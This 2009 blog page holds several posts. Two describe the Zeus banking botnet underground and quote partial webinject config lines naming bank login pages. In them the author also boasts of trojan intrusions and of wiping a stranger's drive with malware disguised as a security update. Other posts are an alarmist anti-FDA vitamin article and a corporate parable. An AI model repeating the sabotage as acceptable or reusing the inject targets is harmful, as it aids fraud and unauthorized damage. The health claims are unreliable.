April 30, 2009

The Underground of the Cyber Age, PT II

Following the post below, I found a post on one of the sites I found. I found it very interesting. I'm not going to go into the entire story of what it's about, but I will give you one post in particular. It just makes you think twice about what is really happening in the world of the underground.

The post was originally made December 22, 2008, shortly after the Conficker worm was detected. I've also included related links in the posted text.

Originally Posted by XXXXXXXXXX
What are you smoking?

Zeus has never been open source and it isn't a phishing botnet either. It is a professional form grabber, used for banking and similar things. The web part has not been encrypted, but that doesn't mean that it is open source!

My, didn't YOU get out of the wrong side of the bed, XXXXXXXXXXX! A water pump in a car does not make a motor car what it is. It just pumps water around the engine serving a basic purpose. It is the sum total of all the other parts that make the car what it is. Change the water pump for any other type that has the same specs, and the car is still the same car it always was.

Zeus, in the context of this thread, IS a phishing botnet!

And looking at the version I got from meta-human (see his post), I am looking at 62/63 totally open source files of html, PHP and config related text files. Oh, and one little exe (aka the water pump).

Zeus (the phishing botnet) was first developed by a very smart Russian programmer who calls himself A-Z, and is said to be about 24 years old. He cut his teeth by infecting the world with worms for fun, but then decided to monetize his efforts when he became a hired/contract gun for the Russian Business Network (though it wasn't called that then).

He started by selling his phishing botnet for $3,000, but then found market prices crashed when many others rebranded his open scripts, control panel etc, and so he took a different tack.

Last summer he helped a German cybercrime gang empty $6,000,000 from the commercial customers of 20 European banks by customizing his Zeus phishing botnet.

How it worked was that from the HUGE number of phished bank account data collected, they combed it to find those accounts which were commercial accounts. The reason was that the banks had limited Internet transfers to commercial customers with special certificates.

The A-Z/Zeus/German gang then used a "spear phishing" campaign against these commercial customers with a "man in the middle technique".

Spear phishing is basically a targeted phishing attack, and man-in-the-middle is where the real customer logs into his real account, and the botnet sneaks through a cash transfer of $5,000-$10,000 while he is not looking.

All very clever, all well coordinated, all undertaken by use of the Zeus phishing botnet by its author, A-Z.

Here are a few interesting links for reading that delve a little deeper into what is happening out there.

Interview with originator of MPack.
There's a Cyber War Looming
RBNExploit Blog

The Underground of the Cyber Age, PT I

Since I got my first PC back in 1999, I tore the thing apart to see how it works. I played with this and that; I was curious. In the true sense of the word, I was a hacker. Even long before I knew what a PC was, when it came to anything mechanical or electronic, I wanted to see how it worked, to see if I could make it work better and even make it do things it wasn't meant to do.

This whole new Cyber World was interesting. I could talk to people from long distances without running up a phone bill. I could put my art out there for everyone to see and I could run into more assholes than I wanted to. But when the time came and I lost my bank card to someone on the net, I learned of a whole new genre or sub-sect of this Cyber World.

Call them hackers, phreakers or script kiddies, these groups of people have a whole other way of living in their off time, and some full time. So back in the year 2000, I started to teach myself computer security. I didn't want this to happen again. So I read everything I could. Learned what a virus was, how worms worked, what a trojan was. Even taught myself how to code some of these things. I created a few small simple viruses that did nothing but replicate a text file up to 1,000 times before it deleted itself. But I never released it to the public or in the "wild".

I even used the popular trojans of the day like Sub7, Back Orifice and Hack'a'Tack. And out of the countless systems that were ever compromised, I learnt how to subvert firewalls and security software. And out of all those systems, only once and once ever did I damage a system. Some guy in Italy looking at child porn. I played with him a few minutes, then I uploaded a program called Hard Drive Killer and set it to look like his security software. Gave him an error message that his software errored and he needed to update it. He ran my software and boom, no more hard drive.

Shortly after that, I got bored with all of that. I got good at removing the infections that the others were releasing. It even landed me some jobs and cash helping protect PCs. And I have stuck with that path for a long time now. And in my current job, I am doing just that plus a lot of other PC related business. But in the last 6-8 months, I have been looking into a career change, along the lines of computer forensics. So I started looking into it as I went about my daily business. And during this time, including today, I have dealt with all of the new viruses, infections, malware, etc. And I have seen how much more sophisticated it has become and how much harder it is for the security vendors to keep up with it. A perfect example is the new Conficker worm. For the longest time, no one knew what was going to happen when it went off.

Anyways, I read on a daily basis of all the lawsuits for copyright this, trademark this, RIAA, MPAA, etc. And then I read my security blogs and other news. And the amount of people I talk to on a daily basis that really have no clue on what the PC really is other than a toy to get music and watch movies. How much we have become dependent on a piece of machinery to run our lives. And yet I just found out, no matter how much I have read, I'm the one that really doesn't understand. Just the other night, I got that wake up call.

I was Googling for something, which I have forgotten what it was, when I came across a link. Opening the link to the site, I discovered a tool that I had heard about only a month before all over the different sites I read. A new virus maker. Cool, I thought, a new toy I can play with and look at. So I downloaded it, loaded up my virtual PC and had a look. Nothing special. It could create a small virus that does a lot, from blocking certain aspects of the PC to formatting the hard drive. I've seen these programs in the past. So as I was ready to call it a night, I opened the Read Me file that was with it. In the file, it included the site of the maker. So I opened it. Total foreign language. But there was something in English so I had a look. One thing led to another and I found other sites, and more sites and more sites.

I Googled a few of these sites and nothing came in return. I tried a few more and got a few lucky results. But the ones that really have the goods weren't coming up in any search. So I bookmarked them for later viewing and went to bed. Just the other night, I started looking through these sites on my virtual PC. I came across one I had bookmarked and started reading through the forums. Some of it in English, some of it in Russian. Next thing I knew, after downloading and looking at some things, and done reading for the night, it was 5am.

Last night, however, really opened my eyes. It made me realize that what I thought was the underground of the Cyber World is more a facade of kids and automated programs. On one of these sites, there was talk from a hacker about a new botnet he was working on. For those of you who don't know what a botnet is, read this.

So I'm reading through this post. The hacker is from Russia, along with a few of his counterparts on this site. He goes on to talk about what this new botnet is. He even put a beta version of it out for other people to take a look at. This post, and some of the others I have read, is where it all kind of comes together.

Basically, the hacker creates the worms, viruses or botnets and then sells them to the highest bidder. The things these people create are not your everyday run-of-the-mill things you might see, but the complicated and sophisticated stuff that can really do a number. This hacker said that once it's done, he will have a public release for anyone to use, then a private release which is for sale that has more controls in it as well as support for it. His asking price, currently around $3,000. That's a hell of a lot of money for a piece of programming, but then so is the price of some of the software I have bought over the years.

Apparently that's how this underground works. And the price varies depending on the product. So I continued reading and even downloaded his trial version. Now, I'm a mediocre web designer. I can code in HTML, XHTML, CSS and some PHP. But what I saw left me speechless. What I had in my hand was the newest, undetectable banking botnet. Meaning, it was designed to steal any and all banking, eBay, PayPal information from one's PC once it was infected. This is accomplished by what's called a drive-by download. Same thing as a drive-by shooting, only instead of a human life, it's your financial life.

So I started going through the code. Some of it I understood. Most of it was a little over my head, but I'm sure I can figure it all out. But even then, it wasn't the code that got me. It was what was in the included files that struck a nerve. So what was it? I'll paste only a few parts of it, with modified code so it shows up.

set_url https://www.us.hsbc.com/* GL
< cellspacing="0" summary="page layout">
< /table>

set_url https://online.wellsfargo.com/login* GP
< input type="password" name="password"*
< width="225">< for="password" class="formlabel">3. ATM PIN< /label><>
< type="password" name="USpass" id="atmpin" size="20" maxlength="14" title="Enter ATM PIN" tabindex="11" accesskey="A">
<> < /td>
< for="account" class="formlabel">
4. Sign on to
< /label>

set_url https://online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary GL
_accountSummaryContainer"*< /tr>
< /table>

And the list went on and on and on. Then, after the listing of the financial businesses, was all of the extra injection code. All of this is designed to get your usernames and passwords to your banks, PayPal, etc. and email it in a text file back to whoever controls it. And on the other side is someone looking to make a few extra (thousands) dollars. All for buying a program someone created. So what does this mean to you and me? When you're browsing the internet, be careful. Any site on the net can be infected with one of these drive-by downloads.
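For anyone who recovers a file like this during a cleanup, the `set_url` lines are the quickest way to see which institutions it targets. The following is an added example, not part of the original post or of the tool it describes: it lists the targeted hosts and checks whether a given URL is covered by a mask. It assumes `*` is the only wildcard and that the `G` and `P` flags select GET and POST requests; the sample input is constructed from the three `set_url` lines quoted above.

```python
import re

# Constructed sample: the three set_url lines quoted in the post. The HTML
# fragments between them (mangled in the post) are replaced by placeholders.
SAMPLE = """\
set_url https://www.us.hsbc.com/* GL
<fragment omitted>

set_url https://online.wellsfargo.com/login* GP
<fragment omitted>

set_url https://online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary GL
<fragment omitted>
"""

SET_URL = re.compile(r"^\s*set_url\s+(\S+)(?:\s+(\S+))?\s*$")
HOST = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://([^/?#]+)")
# Assumption: G and P select GET and POST requests; other letters are kept
# as-is and not interpreted.
METHOD_FLAGS = {"G": "GET", "P": "POST"}


def parse_set_url(text):
    """Return one dict per set_url line: mask, host, methods, other flags."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SET_URL.match(line)
        if not m:
            continue  # fragment lines and blanks are ignored
        mask, flags = m.group(1), m.group(2) or ""
        host = HOST.match(mask)
        entries.append({
            "line": lineno,
            "mask": mask,
            "host": host.group(1).lower() if host else "",
            "methods": [METHOD_FLAGS[f] for f in flags if f in METHOD_FLAGS],
            "other_flags": "".join(f for f in flags if f not in METHOD_FLAGS),
        })
    return entries


def mask_to_regex(mask):
    """Translate a URL mask to a regex. Assumption: '*' is the only wildcard."""
    body = "".join(".*" if ch == "*" else re.escape(ch) for ch in mask)
    return re.compile(body, re.IGNORECASE | re.DOTALL)


def matching_entries(url, entries):
    """Entries whose mask covers the given URL (e.g. one of your own pages)."""
    return [e for e in entries if mask_to_regex(e["mask"]).fullmatch(url)]


def targeted_hosts(entries):
    """Sorted, de-duplicated host list for notification or blocklist review."""
    return sorted({e["host"] for e in entries if e["host"]})


if __name__ == "__main__":
    found = parse_set_url(SAMPLE)
    for host in targeted_hosts(found):
        print(host)
    for e in matching_entries("https://online.wellsfargo.com/login?src=home", found):
        print("covered by line", e["line"], e["mask"], e["methods"])
```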

The fact that someone has taken this "toy" that we use on a daily basis and used it in a way that makes the mob of the days gone by look like children is in fact scary. Most people only hear about it on the news or in the paper. Very few understand it, many more could care less. But when you have an understanding of a few aspects of what's happening, and finally see this in full black and white, it gives you a whole new outlook on the entire Cyber World thing.

Will this ever stop? 90% no. Only because these people have the knowledge and the know-how to craft their skills to stay ahead of the norm. Though a few get picked off here and there, the underground is so large, we would have to cull the planet of PCs and the governments of the world would have to outlaw them. And even then, I don't think it would be 100% gone.

Vitamin B-6 Declared a “Drug” by FDA

Taken from another blog...

God help us, because the FDA has now opened the gateway for all vitamins to be declared “drugs” and removed from sale by the nutritional supplement industry.

What they have done is declared that pyridoxamine (one of the three primary forms of vitamin B-6) is in reality a “new drug,” thus clearing the way for it to be banned from sale as a nutritional supplement. (See the news article below this commentary for more details.)

Here’s what happened:

Some years back a North Carolina-based firm called Biostratum began research and testing on a pyridoxamine-based drug, which they called Pyridorin. It is designed to prevent the progression of diabetic nephropathy (kidney disease). The company then petitioned the FDA to declare pyridoxamine a “new drug,” clearing the way for them to hold an iron-clad monopoly on its sale.

Today, the FDA agreed with Biostratum, and declared this form of vitamin B-6 to indeed be a “new drug,” using the argument that its medical qualities had been under investigation for years before it was ever used as a nutritional supplement under the DSHEA, which ironically was enacted in 1994 in order to protect nutritional supplements from excessive FDA regulation.

Not to worry, said many observers in the nutritional supplement industry. After all, there are other forms of vitamin B-6 that can still be used in multi-vitamin formulations. The problem is, another drug company has already petitioned the FDA to declare the second most popular form of B-6, pyridoxal 5'-phosphate, which is also called P5P, a “new drug,” apparently for the very same reason pyridoxamine has been declared a drug, i.e., its purely medical qualities have been investigated long before it was ever used as a nutritional supplement.

How much longer before other forms of B-6 will be declared a “drug”? You can bet your boots the pharmaceutical companies are racing to get in on the FDA’s new fast-track for turning B-vitamins into drugs.

Will All Vitamins Eventually Be Declared Drugs?

Worst of all, the very same argument being used to declare vitamin B6 a “drug” can essentially be made for any vitamin. After all, every known vitamin on the face of the earth has been studied for its medicinal qualities ever since the discovery of the existence of vitamins in food back in 1905, when a scientist named William Fletcher realized that foods contained special nutrients that actually prevented disease.

It is easy to see that the day is soon-coming in which all vitamins will be offered solely as “drugs,” by prescription only.

One of the most galling aspects of the whole thing is that the FDA flatly refuses to allow nutritional supplement manufacturers to even mention the incredible medicinal values of the vitamins, minerals and other supplements they sell. Indeed, the FDA routinely claims vitamin and mineral supplements are “useless” and “inert.” Yet when a drug company develops the same natural molecule as a “drug,” suddenly its medical benefits can be touted from the rooftops. The only problem is, the drug company is given a monopoly to produce the “drug,” and what was once a natural product available inexpensively in any health food store in America is now an expensive drug you have to get a prescription for.

Drug-Induced B-6 Deficiency a Growing Phenomena

Another serious issue regarding B-6 is that a growing number of medications actually deplete the body of this vital nutrient that is absolutely essential to life. The syndrome is called Drug Induced Pyridoxine Deficiency, and several drugs, including drugs for the treatment of tuberculosis, Parkinson’s Disease and for cancer are known to cause this syndrome, which essentially turns you into a mental vegetable by depleting your body of its needed stores of vitamin B-6.

Foods that Contain Vitamin B-6 Naturally

Under the circumstances it is important to note that certain foods contain vitamin B-6 naturally. They are, in order of their content percentage of the recommended daily value of the vitamin:

Baked potato, flesh and skin, 1 medium: 0.7 mg ~ 35% DV
Banana, raw, 1 medium: 0.68 mg ~ 34% DV
Garbanzo beans, canned, 1/2 c: 0.57 mg ~ 30% DV
Chicken breast, meat only, cooked, 1/2 breast: 0.52 mg ~ 25% DV
Pork loin, lean only, cooked, 3 oz: 0.42 mg ~ 20% DV
Roast beef, eye of round, lean only, cooked, 3 oz: 0.32 mg ~ 15% DV
Trout, rainbow, cooked, 3 oz: 0.29 mg ~ 15% DV
Sunflower seeds, kernels, dry roasted, 1 oz: 0.23 mg ~ 10% DV
Avocado, raw, sliced, 1/2 cup: 0.2 mg ~ 10% DV
Salmon, Sockeye, cooked, 3 oz: 0.19 mg ~ 10% DV
Tuna, canned in water, drained solids, 3 oz: 0.18 mg ~ 10% DV
Peanut butter, smooth, 2 Tbs: 0.15 mg ~ 8% DV

More importantly, safe, simple Brewer’s Yeast contains relatively high levels of B-vitamins, including B-6. Capsulated Brewer’s Yeast can be purchased in just about any health food store in the country, or is available through many online sources.

What to Do Now

Legally speaking, as of today, anyone wanting to purchase the pyridoxamine form of B-6, and probably soon the P5P form, will have to have a doctor's prescription to do so.

One thing you can do is go to the web site of the American Association for Health Freedom and sign their petition to stop the FDA from turning any more vitamins into drugs.

You should also write and call your Congressmen and Senators immediately, and tell them you don’t want the FDA banning any more vitamins by turning them into “drugs.”

It is high time we all start expressing our outrage at this outlandish behavior by the FDA and other bureaucracies in regards to their disdain for nutritional supplements. We now have the EPA trying to re-classify colloidal silver as a "pesticide" so they can ban its sale in health food stores. And we have the FDA actually re-classifying common vitamins as drugs. And it is all at the behest of the major pharmaceutical companies.

The handwriting is on the wall. And frankly, it is up to "we the people" to put a stop to this egregious breach of our health freedoms.

-- S. Spencer Jones

FDA Declares Form of Vitamin B6 a Drug, Effectively Banning Pyridoxamine from Dietary Supplements

Thursday, February 12, 2009 by: Mike Adams, the Health Ranger, NaturalNews Editor

(NaturalNews) The FDA has effectively banned a naturally-occurring form of vitamin B6 called pyridoxamine by declaring it to be a drug, reports the American Association for Health Freedom.
Responding to a petition filed by a drug company, the FDA declared pyridoxamine to be "a new drug."

Now, any nutritional supplements containing pyridoxamine will be considered adulterated and illegal by the FDA, which may raid vitamin companies and seize such products. See the history of FDA raids on vitamin companies here: http://www.naturalnews.com/021791.html

Pyridoxamine occurs naturally in fish, chicken and other foods (http://en.wikipedia.org/wiki/Vitamin_B6), putting the FDA in the strange position of banning a substance from dietary supplements even though it is already present in the food supply.

The FDA's war on Mother Nature

It's not the first time the FDA has declared a natural molecule to be a "drug" while attacking nutritional supplements that contain the same molecule. A similar story unfolded with red yeast rice and the lovastatin molecules it contains that lower high cholesterol. The drug companies engaged in biopiracy, ripping off the molecule from red yeast rice to make their now-famous "statin drugs."

Once the statin drugs were patented, Big Pharma and the FDA went after red yeast rice, claiming the supplement was "adulterated with pharmaceuticals." It wasn't really adulterated, of course. It just contained a natural statin-drug-like molecule that the drug companies copied and patented.

It would be like Big Pharma patenting vitamin C, then the FDA claiming that all oranges and lemons were adulterated with drugs because they naturally contain their own vitamin C.

This is the insanity of the FDA as it operates today. You can read more about the FDA on our channel website www.FDAreform.org which is updated every few days.

So will this ruling on pyridoxamine affect nutritional supplements? Yes, any supplements containing this form of vitamin B6 can now be declared "adulterated" by the FDA. Manufacturers of such supplements can be arrested and shut down for engaging in "illegal drug trafficking." Such is the nature of the FDA's agenda to criminalize nutritional supplement companies and limit consumers' access to Mother Nature's remedies.

The pyridoxamine "drug," by the way (which is just pyridoxamine), is designed to prevent the progression of diabetic nephropathy (kidney disease). Most likely, the FDA will eventually approve the "drug" for that condition, even while claiming vitamin B6 supplements containing the very same chemical are useless and inert.

This is another classic oppression tactic of the FDA: Ban the herb, but promote the drug using the same chemicals. The same thing happened with ephedra, a Traditional Chinese Medicine herb known as ma huang. The FDA banned the herb, saying it was "dangerous at any dose," but pharmaceuticals containing the very same molecules (ephedrine) are still being sold over-the-counter as cold medicines, meaning they're available to any child without a prescription.

The bottom line is this: FDA approvals and bans have nothing to do with science and everything to do with protecting drug companies' profits. If a drug company can make money selling a vitamin as a drug, the FDA will gladly ban the vitamin and protect the drug. If a drug company can rip off molecules from Mother Nature and patent them, the FDA will ban those same molecules found in nature.

All of this points to the urgent need to reform the FDA. A new petition demanding real FDA reform will be announced here on NaturalNews in the coming days.

A Modern Parable to the Auto Bailout

A Japanese company (Toyota) and an American company (CHRYSLER) decided to have a canoe race on the River. Both teams practiced long and hard to reach their peak performance before the race.

On the big day, the Japanese won by a mile.

The Americans, very discouraged and depressed, decided to investigate the reason for the crushing defeat. A management team made up of senior management was formed to investigate and recommend appropriate action.

Their conclusion was the Japanese had 8 people rowing and 1 person steering, while the American team had 7 people steering and 2 people rowing.

Feeling a deeper study was in order, American management hired a consulting company and paid them a large amount of money for a second opinion.

They advised, of course, that too many people were steering the boat, while not enough people were rowing.

Not sure of how to utilize that information, but wanting to prevent another loss to the Japanese, the rowing team's management structure was totally reorganized to 4 steering supervisors, 2 area steering superintendents and 1 assistant superintendent steering manager.

They also implemented a new performance system that would give the 2 people rowing the boat greater incentive to work harder. It was called the 'Rowing Team Quality First Program,' with meetings, dinners and free pens for the rowers. There was discussion of getting new paddles, canoes and other equipment, extra vacation days for practices and bonuses. The pension program was trimmed to 'equal the competition' and some of the resultant savings were channeled into morale boosting programs and teamwork posters.

The next year the Japanese won by two miles.

Humiliated, the American management laid off one rower, halted development of a new canoe, sold all the paddles, and canceled all capital investments for new equipment. The money saved was distributed to the Senior Executives as bonuses.

The next year, try as he might, the lone designated rower was unable to even finish the race (having no paddles), so he was laid off for unacceptable performance, all canoe equipment was sold and the next year's racing team was out-sourced to India.

The End.

Here's something else to think about: Ford has spent the last thirty years moving all its factories out of the US, claiming they can't make money paying American wages.

TOYOTA has spent the last thirty years building more than a dozen plants inside the US. The last quarter's results:

TOYOTA makes 4 billion in profits while Ford racked up 9 billion in losses.

Ford folks are still scratching their heads, and collecting bonuses...

